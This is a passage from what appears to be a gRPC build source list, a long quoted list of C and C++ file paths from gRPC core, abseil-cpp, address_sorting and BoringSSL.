'src/core/lib/gprpp/stat_posix.cc',
'src/core/lib/gprpp/stat_windows.cc',
'src/core/lib/gprpp/status_helper.cc',
'src/core/lib/gprpp/thd_posix.cc',
'src/core/lib/gprpp/thd_windows.cc',
'src/core/lib/gprpp/time_util.cc',
'src/core/lib/http/format_request.cc',
'src/core/lib/http/httpcli.cc',
'src/core/lib/http/httpcli_security_connector.cc',
'src/core/lib/http/parser.cc',
'src/core/lib/iomgr/buffer_list.cc',
'src/core/lib/iomgr/call_combiner.cc',
'src/core/lib/iomgr/cfstream_handle.cc',
'src/core/lib/iomgr/combiner.cc',
'src/core/lib/iomgr/dualstack_socket_posix.cc',
'src/core/lib/iomgr/endpoint.cc',
'src/core/lib/iomgr/endpoint_cfstream.cc',
'src/core/lib/iomgr/endpoint_pair_event_engine.cc',
'src/core/lib/iomgr/endpoint_pair_posix.cc',
'src/core/lib/iomgr/endpoint_pair_windows.cc',
'src/core/lib/iomgr/error.cc',
'src/core/lib/iomgr/error_cfstream.cc',
'src/core/lib/iomgr/ev_apple.cc',
'src/core/lib/iomgr/ev_epoll1_linux.cc',
'src/core/lib/iomgr/ev_epollex_linux.cc',
'src/core/lib/iomgr/ev_poll_posix.cc',
'src/core/lib/iomgr/ev_posix.cc',
'src/core/lib/iomgr/ev_windows.cc',
'src/core/lib/iomgr/event_engine/closure.cc',
'src/core/lib/iomgr/event_engine/endpoint.cc',
'src/core/lib/iomgr/event_engine/iomgr.cc',
'src/core/lib/iomgr/event_engine/pollset.cc',
'src/core/lib/iomgr/event_engine/resolved_address_internal.cc',
'src/core/lib/iomgr/event_engine/resolver.cc',
'src/core/lib/iomgr/event_engine/tcp.cc',
'src/core/lib/iomgr/event_engine/timer.cc',
'src/core/lib/iomgr/exec_ctx.cc',
'src/core/lib/iomgr/executor.cc',
'src/core/lib/iomgr/executor/mpmcqueue.cc',
'src/core/lib/iomgr/executor/threadpool.cc',
'src/core/lib/iomgr/fork_posix.cc',
'src/core/lib/iomgr/fork_windows.cc',
'src/core/lib/iomgr/gethostname_fallback.cc',
'src/core/lib/iomgr/gethostname_host_name_max.cc',
'src/core/lib/iomgr/gethostname_sysconf.cc',
'src/core/lib/iomgr/grpc_if_nametoindex_posix.cc',
'src/core/lib/iomgr/grpc_if_nametoindex_unsupported.cc',
'src/core/lib/iomgr/internal_errqueue.cc',
'src/core/lib/iomgr/iocp_windows.cc',
'src/core/lib/iomgr/iomgr.cc',
'src/core/lib/iomgr/iomgr_custom.cc',
'src/core/lib/iomgr/iomgr_internal.cc',
'src/core/lib/iomgr/iomgr_posix.cc',
'src/core/lib/iomgr/iomgr_posix_cfstream.cc',
'src/core/lib/iomgr/iomgr_windows.cc',
'src/core/lib/iomgr/is_epollexclusive_available.cc',
'src/core/lib/iomgr/load_file.cc',
'src/core/lib/iomgr/lockfree_event.cc',
'src/core/lib/iomgr/polling_entity.cc',
'src/core/lib/iomgr/pollset.cc',
'src/core/lib/iomgr/pollset_custom.cc',
'src/core/lib/iomgr/pollset_set.cc',
'src/core/lib/iomgr/pollset_set_custom.cc',
'src/core/lib/iomgr/pollset_set_windows.cc',
'src/core/lib/iomgr/pollset_windows.cc',
'src/core/lib/iomgr/resolve_address.cc',
'src/core/lib/iomgr/resolve_address_custom.cc',
'src/core/lib/iomgr/resolve_address_posix.cc',
'src/core/lib/iomgr/resolve_address_windows.cc',
'src/core/lib/iomgr/socket_factory_posix.cc',
'src/core/lib/iomgr/socket_mutator.cc',
'src/core/lib/iomgr/socket_utils_common_posix.cc',
'src/core/lib/iomgr/socket_utils_linux.cc',
'src/core/lib/iomgr/socket_utils_posix.cc',
'src/core/lib/iomgr/socket_utils_windows.cc',
'src/core/lib/iomgr/socket_windows.cc',
'src/core/lib/iomgr/tcp_client.cc',
'src/core/lib/iomgr/tcp_client_cfstream.cc',
'src/core/lib/iomgr/tcp_client_custom.cc',
'src/core/lib/iomgr/tcp_client_posix.cc',
'src/core/lib/iomgr/tcp_client_windows.cc',
'src/core/lib/iomgr/tcp_custom.cc',
'src/core/lib/iomgr/tcp_posix.cc',
'src/core/lib/iomgr/tcp_server.cc',
'src/core/lib/iomgr/tcp_server_custom.cc',
'src/core/lib/iomgr/tcp_server_posix.cc',
'src/core/lib/iomgr/tcp_server_utils_posix_common.cc',
'src/core/lib/iomgr/tcp_server_utils_posix_ifaddrs.cc',
'src/core/lib/iomgr/tcp_server_utils_posix_noifaddrs.cc',
'src/core/lib/iomgr/tcp_server_windows.cc',
'src/core/lib/iomgr/tcp_windows.cc',
'src/core/lib/iomgr/time_averaged_stats.cc',
'src/core/lib/iomgr/timer.cc',
'src/core/lib/iomgr/timer_custom.cc',
'src/core/lib/iomgr/timer_generic.cc',
'src/core/lib/iomgr/timer_heap.cc',
'src/core/lib/iomgr/timer_manager.cc',
'src/core/lib/iomgr/unix_sockets_posix.cc',
'src/core/lib/iomgr/unix_sockets_posix_noop.cc',
'src/core/lib/iomgr/wakeup_fd_eventfd.cc',
'src/core/lib/iomgr/wakeup_fd_nospecial.cc',
'src/core/lib/iomgr/wakeup_fd_pipe.cc',
'src/core/lib/iomgr/wakeup_fd_posix.cc',
'src/core/lib/iomgr/work_serializer.cc',
'src/core/lib/json/json_reader.cc',
'src/core/lib/json/json_util.cc',
'src/core/lib/json/json_writer.cc',
'src/core/lib/matchers/matchers.cc',
'src/core/lib/profiling/basic_timers.cc',
'src/core/lib/profiling/stap_timers.cc',
'src/core/lib/promise/activity.cc',
'src/core/lib/resolver/resolver.cc',
'src/core/lib/resolver/resolver_registry.cc',
'src/core/lib/resolver/server_address.cc',
'src/core/lib/resource_quota/api.cc',
'src/core/lib/resource_quota/arena.cc',
'src/core/lib/resource_quota/memory_quota.cc',
'src/core/lib/resource_quota/resource_quota.cc',
'src/core/lib/resource_quota/thread_quota.cc',
'src/core/lib/resource_quota/trace.cc',
'src/core/lib/security/authorization/authorization_policy_provider_vtable.cc',
'src/core/lib/security/authorization/evaluate_args.cc',
'src/core/lib/security/authorization/grpc_authorization_engine.cc',
'src/core/lib/security/authorization/matchers.cc',
'src/core/lib/security/authorization/rbac_policy.cc',
'src/core/lib/security/authorization/sdk_server_authz_filter.cc',
'src/core/lib/security/context/security_context.cc',
'src/core/lib/security/credentials/alts/alts_credentials.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment_linux.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment_no_op.cc',
'src/core/lib/security/credentials/alts/check_gcp_environment_windows.cc',
'src/core/lib/security/credentials/alts/grpc_alts_credentials_client_options.cc',
'src/core/lib/security/credentials/alts/grpc_alts_credentials_options.cc',
'src/core/lib/security/credentials/alts/grpc_alts_credentials_server_options.cc',
'src/core/lib/security/credentials/composite/composite_credentials.cc',
'src/core/lib/security/credentials/credentials.cc',
'src/core/lib/security/credentials/external/aws_external_account_credentials.cc',
'src/core/lib/security/credentials/external/aws_request_signer.cc',
'src/core/lib/security/credentials/external/external_account_credentials.cc',
'src/core/lib/security/credentials/external/file_external_account_credentials.cc',
'src/core/lib/security/credentials/external/url_external_account_credentials.cc',
'src/core/lib/security/credentials/fake/fake_credentials.cc',
'src/core/lib/security/credentials/google_default/credentials_generic.cc',
'src/core/lib/security/credentials/google_default/google_default_credentials.cc',
'src/core/lib/security/credentials/iam/iam_credentials.cc',
'src/core/lib/security/credentials/insecure/insecure_credentials.cc',
'src/core/lib/security/credentials/jwt/json_token.cc',
'src/core/lib/security/credentials/jwt/jwt_credentials.cc',
'src/core/lib/security/credentials/jwt/jwt_verifier.cc',
'src/core/lib/security/credentials/local/local_credentials.cc',
'src/core/lib/security/credentials/oauth2/oauth2_credentials.cc',
'src/core/lib/security/credentials/plugin/plugin_credentials.cc',
'src/core/lib/security/credentials/ssl/ssl_credentials.cc',
'src/core/lib/security/credentials/tls/grpc_tls_certificate_distributor.cc',
'src/core/lib/security/credentials/tls/grpc_tls_certificate_provider.cc',
'src/core/lib/security/credentials/tls/grpc_tls_certificate_verifier.cc',
'src/core/lib/security/credentials/tls/grpc_tls_credentials_options.cc',
'src/core/lib/security/credentials/tls/tls_credentials.cc',
'src/core/lib/security/credentials/tls/tls_utils.cc',
'src/core/lib/security/credentials/xds/xds_credentials.cc',
'src/core/lib/security/security_connector/alts/alts_security_connector.cc',
'src/core/lib/security/security_connector/fake/fake_security_connector.cc',
'src/core/lib/security/security_connector/insecure/insecure_security_connector.cc',
'src/core/lib/security/security_connector/load_system_roots_fallback.cc',
'src/core/lib/security/security_connector/load_system_roots_linux.cc',
'src/core/lib/security/security_connector/local/local_security_connector.cc',
'src/core/lib/security/security_connector/security_connector.cc',
'src/core/lib/security/security_connector/ssl/ssl_security_connector.cc',
'src/core/lib/security/security_connector/ssl_utils.cc',
'src/core/lib/security/security_connector/ssl_utils_config.cc',
'src/core/lib/security/security_connector/tls/tls_security_connector.cc',
'src/core/lib/security/transport/client_auth_filter.cc',
'src/core/lib/security/transport/secure_endpoint.cc',
'src/core/lib/security/transport/security_handshaker.cc',
'src/core/lib/security/transport/server_auth_filter.cc',
'src/core/lib/security/transport/tsi_error.cc',
'src/core/lib/security/util/json_util.cc',
'src/core/lib/service_config/service_config.cc',
'src/core/lib/service_config/service_config_parser.cc',
'src/core/lib/slice/b64.cc',
'src/core/lib/slice/percent_encoding.cc',
'src/core/lib/slice/slice.cc',
'src/core/lib/slice/slice_api.cc',
'src/core/lib/slice/slice_buffer.cc',
'src/core/lib/slice/slice_refcount.cc',
'src/core/lib/slice/slice_split.cc',
'src/core/lib/slice/slice_string_helpers.cc',
'src/core/lib/surface/api_trace.cc',
'src/core/lib/surface/builtins.cc',
'src/core/lib/surface/byte_buffer.cc',
'src/core/lib/surface/byte_buffer_reader.cc',
'src/core/lib/surface/call.cc',
'src/core/lib/surface/call_details.cc',
'src/core/lib/surface/call_log_batch.cc',
'src/core/lib/surface/channel.cc',
'src/core/lib/surface/channel_init.cc',
'src/core/lib/surface/channel_ping.cc',
'src/core/lib/surface/channel_stack_type.cc',
'src/core/lib/surface/completion_queue.cc',
'src/core/lib/surface/completion_queue_factory.cc',
'src/core/lib/surface/event_string.cc',
'src/core/lib/surface/init.cc',
'src/core/lib/surface/init_secure.cc',
'src/core/lib/surface/lame_client.cc',
'src/core/lib/surface/metadata_array.cc',
'src/core/lib/surface/server.cc',
'src/core/lib/surface/validate_metadata.cc',
'src/core/lib/surface/version.cc',
'src/core/lib/transport/bdp_estimator.cc',
'src/core/lib/transport/byte_stream.cc',
'src/core/lib/transport/connectivity_state.cc',
'src/core/lib/transport/error_utils.cc',
'src/core/lib/transport/parsed_metadata.cc',
'src/core/lib/transport/pid_controller.cc',
'src/core/lib/transport/status_conversion.cc',
'src/core/lib/transport/timeout_encoding.cc',
'src/core/lib/transport/transport.cc',
'src/core/lib/transport/transport_op_string.cc',
'src/core/lib/uri/uri_parser.cc',
'src/core/plugin_registry/grpc_plugin_registry.cc',
'src/core/tsi/alts/crypt/aes_gcm.cc',
'src/core/tsi/alts/crypt/gsec.cc',
'src/core/tsi/alts/frame_protector/alts_counter.cc',
'src/core/tsi/alts/frame_protector/alts_crypter.cc',
'src/core/tsi/alts/frame_protector/alts_frame_protector.cc',
'src/core/tsi/alts/frame_protector/alts_record_protocol_crypter_common.cc',
'src/core/tsi/alts/frame_protector/alts_seal_privacy_integrity_crypter.cc',
'src/core/tsi/alts/frame_protector/alts_unseal_privacy_integrity_crypter.cc',
'src/core/tsi/alts/frame_protector/frame_handler.cc',
'src/core/tsi/alts/handshaker/alts_handshaker_client.cc',
'src/core/tsi/alts/handshaker/alts_shared_resource.cc',
'src/core/tsi/alts/handshaker/alts_tsi_handshaker.cc',
'src/core/tsi/alts/handshaker/alts_tsi_utils.cc',
'src/core/tsi/alts/handshaker/transport_security_common_api.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_grpc_integrity_only_record_protocol.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_grpc_privacy_integrity_record_protocol.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_grpc_record_protocol_common.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_iovec_record_protocol.cc',
'src/core/tsi/alts/zero_copy_frame_protector/alts_zero_copy_grpc_protector.cc',
'src/core/tsi/fake_transport_security.cc',
'src/core/tsi/local_transport_security.cc',
'src/core/tsi/ssl/key_logging/ssl_key_logging.cc',
'src/core/tsi/ssl/session_cache/ssl_session_boringssl.cc',
'src/core/tsi/ssl/session_cache/ssl_session_cache.cc',
'src/core/tsi/ssl/session_cache/ssl_session_openssl.cc',
'src/core/tsi/ssl_transport_security.cc',
'src/core/tsi/transport_security.cc',
'src/core/tsi/transport_security_grpc.cc',
'third_party/abseil-cpp/absl/base/internal/cycleclock.cc',
'third_party/abseil-cpp/absl/base/internal/low_level_alloc.cc',
'third_party/abseil-cpp/absl/base/internal/raw_logging.cc',
'third_party/abseil-cpp/absl/base/internal/spinlock.cc',
'third_party/abseil-cpp/absl/base/internal/spinlock_wait.cc',
'third_party/abseil-cpp/absl/base/internal/sysinfo.cc',
'third_party/abseil-cpp/absl/base/internal/thread_identity.cc',
'third_party/abseil-cpp/absl/base/internal/throw_delegate.cc',
'third_party/abseil-cpp/absl/base/internal/unscaledcycleclock.cc',
'third_party/abseil-cpp/absl/base/log_severity.cc',
'third_party/abseil-cpp/absl/container/internal/hashtablez_sampler.cc',
'third_party/abseil-cpp/absl/container/internal/hashtablez_sampler_force_weak_definition.cc',
'third_party/abseil-cpp/absl/container/internal/raw_hash_set.cc',
'third_party/abseil-cpp/absl/debugging/internal/address_is_readable.cc',
'third_party/abseil-cpp/absl/debugging/internal/demangle.cc',
'third_party/abseil-cpp/absl/debugging/internal/elf_mem_image.cc',
'third_party/abseil-cpp/absl/debugging/internal/vdso_support.cc',
'third_party/abseil-cpp/absl/debugging/stacktrace.cc',
'third_party/abseil-cpp/absl/debugging/symbolize.cc',
'third_party/abseil-cpp/absl/hash/internal/city.cc',
'third_party/abseil-cpp/absl/hash/internal/hash.cc',
'third_party/abseil-cpp/absl/hash/internal/low_level_hash.cc',
'third_party/abseil-cpp/absl/numeric/int128.cc',
'third_party/abseil-cpp/absl/profiling/internal/exponential_biased.cc',
'third_party/abseil-cpp/absl/random/discrete_distribution.cc',
'third_party/abseil-cpp/absl/random/gaussian_distribution.cc',
'third_party/abseil-cpp/absl/random/internal/pool_urbg.cc',
'third_party/abseil-cpp/absl/random/internal/randen.cc',
'third_party/abseil-cpp/absl/random/internal/randen_detect.cc',
'third_party/abseil-cpp/absl/random/internal/randen_hwaes.cc',
'third_party/abseil-cpp/absl/random/internal/randen_round_keys.cc',
'third_party/abseil-cpp/absl/random/internal/randen_slow.cc',
'third_party/abseil-cpp/absl/random/internal/seed_material.cc',
'third_party/abseil-cpp/absl/random/seed_gen_exception.cc',
'third_party/abseil-cpp/absl/random/seed_sequences.cc',
'third_party/abseil-cpp/absl/status/status.cc',
'third_party/abseil-cpp/absl/status/status_payload_printer.cc',
'third_party/abseil-cpp/absl/status/statusor.cc',
'third_party/abseil-cpp/absl/strings/ascii.cc',
'third_party/abseil-cpp/absl/strings/charconv.cc',
'third_party/abseil-cpp/absl/strings/cord.cc',
'third_party/abseil-cpp/absl/strings/escaping.cc',
'third_party/abseil-cpp/absl/strings/internal/charconv_bigint.cc',
'third_party/abseil-cpp/absl/strings/internal/charconv_parse.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_internal.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_btree.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_btree_navigator.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_btree_reader.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_consume.cc',
'third_party/abseil-cpp/absl/strings/internal/cord_rep_ring.cc',
'third_party/abseil-cpp/absl/strings/internal/cordz_functions.cc',
'third_party/abseil-cpp/absl/strings/internal/cordz_handle.cc',
'third_party/abseil-cpp/absl/strings/internal/cordz_info.cc',
'third_party/abseil-cpp/absl/strings/internal/escaping.cc',
'third_party/abseil-cpp/absl/strings/internal/memutil.cc',
'third_party/abseil-cpp/absl/strings/internal/ostringstream.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/arg.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/bind.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/extension.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/float_conversion.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/output.cc',
'third_party/abseil-cpp/absl/strings/internal/str_format/parser.cc',
'third_party/abseil-cpp/absl/strings/internal/utf8.cc',
'third_party/abseil-cpp/absl/strings/match.cc',
'third_party/abseil-cpp/absl/strings/numbers.cc',
'third_party/abseil-cpp/absl/strings/str_cat.cc',
'third_party/abseil-cpp/absl/strings/str_replace.cc',
'third_party/abseil-cpp/absl/strings/str_split.cc',
'third_party/abseil-cpp/absl/strings/string_view.cc',
'third_party/abseil-cpp/absl/strings/substitute.cc',
'third_party/abseil-cpp/absl/synchronization/barrier.cc',
'third_party/abseil-cpp/absl/synchronization/blocking_counter.cc',
'third_party/abseil-cpp/absl/synchronization/internal/create_thread_identity.cc',
'third_party/abseil-cpp/absl/synchronization/internal/graphcycles.cc',
'third_party/abseil-cpp/absl/synchronization/internal/per_thread_sem.cc',
'third_party/abseil-cpp/absl/synchronization/internal/waiter.cc',
'third_party/abseil-cpp/absl/synchronization/mutex.cc',
'third_party/abseil-cpp/absl/synchronization/notification.cc',
'third_party/abseil-cpp/absl/time/civil_time.cc',
'third_party/abseil-cpp/absl/time/clock.cc',
'third_party/abseil-cpp/absl/time/duration.cc',
'third_party/abseil-cpp/absl/time/format.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/civil_time_detail.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_fixed.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_format.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_if.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_impl.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_info.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_libc.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_lookup.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/time_zone_posix.cc',
'third_party/abseil-cpp/absl/time/internal/cctz/src/zone_info_source.cc',
'third_party/abseil-cpp/absl/time/time.cc',
'third_party/abseil-cpp/absl/types/bad_optional_access.cc',
'third_party/abseil-cpp/absl/types/bad_variant_access.cc',
'third_party/address_sorting/address_sorting.c',
'third_party/address_sorting/address_sorting_posix.c',
'third_party/address_sorting/address_sorting_windows.c',
'third_party/boringssl-with-bazel/err_data.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_bitstr.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_bool.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_d2i_fp.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_dup.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_enum.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_gentm.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_i2d_fp.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_int.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_mbstr.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_object.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_octet.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_print.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_strex.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_strnid.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_time.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_type.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_utctm.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/a_utf8.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/asn1_lib.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/asn1_par.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/asn_pack.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/f_int.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/f_string.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_dec.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_enc.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_fre.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_new.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_typ.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/tasn_utl.c',
'third_party/boringssl-with-bazel/src/crypto/asn1/time_support.c',
'third_party/boringssl-with-bazel/src/crypto/base64/base64.c',
'third_party/boringssl-with-bazel/src/crypto/bio/bio.c',
'third_party/boringssl-with-bazel/src/crypto/bio/bio_mem.c',
'third_party/boringssl-with-bazel/src/crypto/bio/connect.c',
'third_party/boringssl-with-bazel/src/crypto/bio/fd.c',
'third_party/boringssl-with-bazel/src/crypto/bio/file.c',
'third_party/boringssl-with-bazel/src/crypto/bio/hexdump.c',
'third_party/boringssl-with-bazel/src/crypto/bio/pair.c',
'third_party/boringssl-with-bazel/src/crypto/bio/printf.c',
'third_party/boringssl-with-bazel/src/crypto/bio/socket.c',
'third_party/boringssl-with-bazel/src/crypto/bio/socket_helper.c',
'third_party/boringssl-with-bazel/src/crypto/blake2/blake2.c',
'third_party/boringssl-with-bazel/src/crypto/bn_extra/bn_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/bn_extra/convert.c',
'third_party/boringssl-with-bazel/src/crypto/buf/buf.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/asn1_compat.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/ber.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/cbb.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/cbs.c',
'third_party/boringssl-with-bazel/src/crypto/bytestring/unicode.c',
'third_party/boringssl-with-bazel/src/crypto/chacha/chacha.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/cipher_extra.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/derive_key.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_aesccm.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_aesctrhmac.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_aesgcmsiv.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_chacha20poly1305.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_null.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_rc2.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_rc4.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/e_tls.c',
'third_party/boringssl-with-bazel/src/crypto/cipher_extra/tls_cbc.c',
'third_party/boringssl-with-bazel/src/crypto/cmac/cmac.c',
'third_party/boringssl-with-bazel/src/crypto/conf/conf.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-aarch64-fuchsia.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-aarch64-linux.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-aarch64-win.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-arm-linux.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-arm.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-intel.c',
'third_party/boringssl-with-bazel/src/crypto/cpu-ppc64le.c',
'third_party/boringssl-with-bazel/src/crypto/crypto.c',
'third_party/boringssl-with-bazel/src/crypto/curve25519/curve25519.c',
'third_party/boringssl-with-bazel/src/crypto/curve25519/spake25519.c',
'third_party/boringssl-with-bazel/src/crypto/dh_extra/dh_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/dh_extra/params.c',
'third_party/boringssl-with-bazel/src/crypto/digest_extra/digest_extra.c',
'third_party/boringssl-with-bazel/src/crypto/dsa/dsa.c',
'third_party/boringssl-with-bazel/src/crypto/dsa/dsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/ec_extra/ec_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/ec_extra/ec_derive.c',
'third_party/boringssl-with-bazel/src/crypto/ec_extra/hash_to_curve.c',
'third_party/boringssl-with-bazel/src/crypto/ecdh_extra/ecdh_extra.c',
'third_party/boringssl-with-bazel/src/crypto/ecdsa_extra/ecdsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/engine/engine.c',
'third_party/boringssl-with-bazel/src/crypto/err/err.c',
'third_party/boringssl-with-bazel/src/crypto/evp/digestsign.c',
'third_party/boringssl-with-bazel/src/crypto/evp/evp.c',
'third_party/boringssl-with-bazel/src/crypto/evp/evp_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/evp_ctx.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_dsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ec.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ec_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ed25519.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_ed25519_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_rsa.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_rsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_x25519.c',
'third_party/boringssl-with-bazel/src/crypto/evp/p_x25519_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/evp/pbkdf.c',
'third_party/boringssl-with-bazel/src/crypto/evp/print.c',
'third_party/boringssl-with-bazel/src/crypto/evp/scrypt.c',
'third_party/boringssl-with-bazel/src/crypto/evp/sign.c',
'third_party/boringssl-with-bazel/src/crypto/ex_data.c',
'third_party/boringssl-with-bazel/src/crypto/fipsmodule/bcm.c',
'third_party/boringssl-with-bazel/src/crypto/fipsmodule/fips_shared_support.c',
'third_party/boringssl-with-bazel/src/crypto/hkdf/hkdf.c',
'third_party/boringssl-with-bazel/src/crypto/hpke/hpke.c',
'third_party/boringssl-with-bazel/src/crypto/hrss/hrss.c',
'third_party/boringssl-with-bazel/src/crypto/lhash/lhash.c',
'third_party/boringssl-with-bazel/src/crypto/mem.c',
'third_party/boringssl-with-bazel/src/crypto/obj/obj.c',
'third_party/boringssl-with-bazel/src/crypto/obj/obj_xref.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_all.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_info.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_lib.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_oth.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_pk8.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_pkey.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_x509.c',
'third_party/boringssl-with-bazel/src/crypto/pem/pem_xaux.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs7/pkcs7.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs7/pkcs7_x509.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs8/p5_pbev2.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs8/pkcs8.c',
'third_party/boringssl-with-bazel/src/crypto/pkcs8/pkcs8_x509.c',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305.c',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305_arm.c',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305_vec.c',
'third_party/boringssl-with-bazel/src/crypto/pool/pool.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/deterministic.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/forkunsafe.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/fuchsia.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/passive.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/rand_extra.c',
'third_party/boringssl-with-bazel/src/crypto/rand_extra/windows.c',
'third_party/boringssl-with-bazel/src/crypto/rc4/rc4.c',
'third_party/boringssl-with-bazel/src/crypto/refcount_c11.c',
'third_party/boringssl-with-bazel/src/crypto/refcount_lock.c',
'third_party/boringssl-with-bazel/src/crypto/rsa_extra/rsa_asn1.c',
'third_party/boringssl-with-bazel/src/crypto/rsa_extra/rsa_print.c',
'third_party/boringssl-with-bazel/src/crypto/siphash/siphash.c',
'third_party/boringssl-with-bazel/src/crypto/stack/stack.c',
'third_party/boringssl-with-bazel/src/crypto/thread.c',
'third_party/boringssl-with-bazel/src/crypto/thread_none.c',
'third_party/boringssl-with-bazel/src/crypto/thread_pthread.c',
'third_party/boringssl-with-bazel/src/crypto/thread_win.c',
'third_party/boringssl-with-bazel/src/crypto/trust_token/pmbtoken.c',
'third_party/boringssl-with-bazel/src/crypto/trust_token/trust_token.c',
'third_party/boringssl-with-bazel/src/crypto/trust_token/voprf.c',
'third_party/boringssl-with-bazel/src/crypto/x509/a_digest.c',
'third_party/boringssl-with-bazel/src/crypto/x509/a_sign.c',
'third_party/boringssl-with-bazel/src/crypto/x509/a_verify.c',
'third_party/boringssl-with-bazel/src/crypto/x509/algorithm.c',
'third_party/boringssl-with-bazel/src/crypto/x509/asn1_gen.c',
'third_party/boringssl-with-bazel/src/crypto/x509/by_dir.c',
'third_party/boringssl-with-bazel/src/crypto/x509/by_file.c',
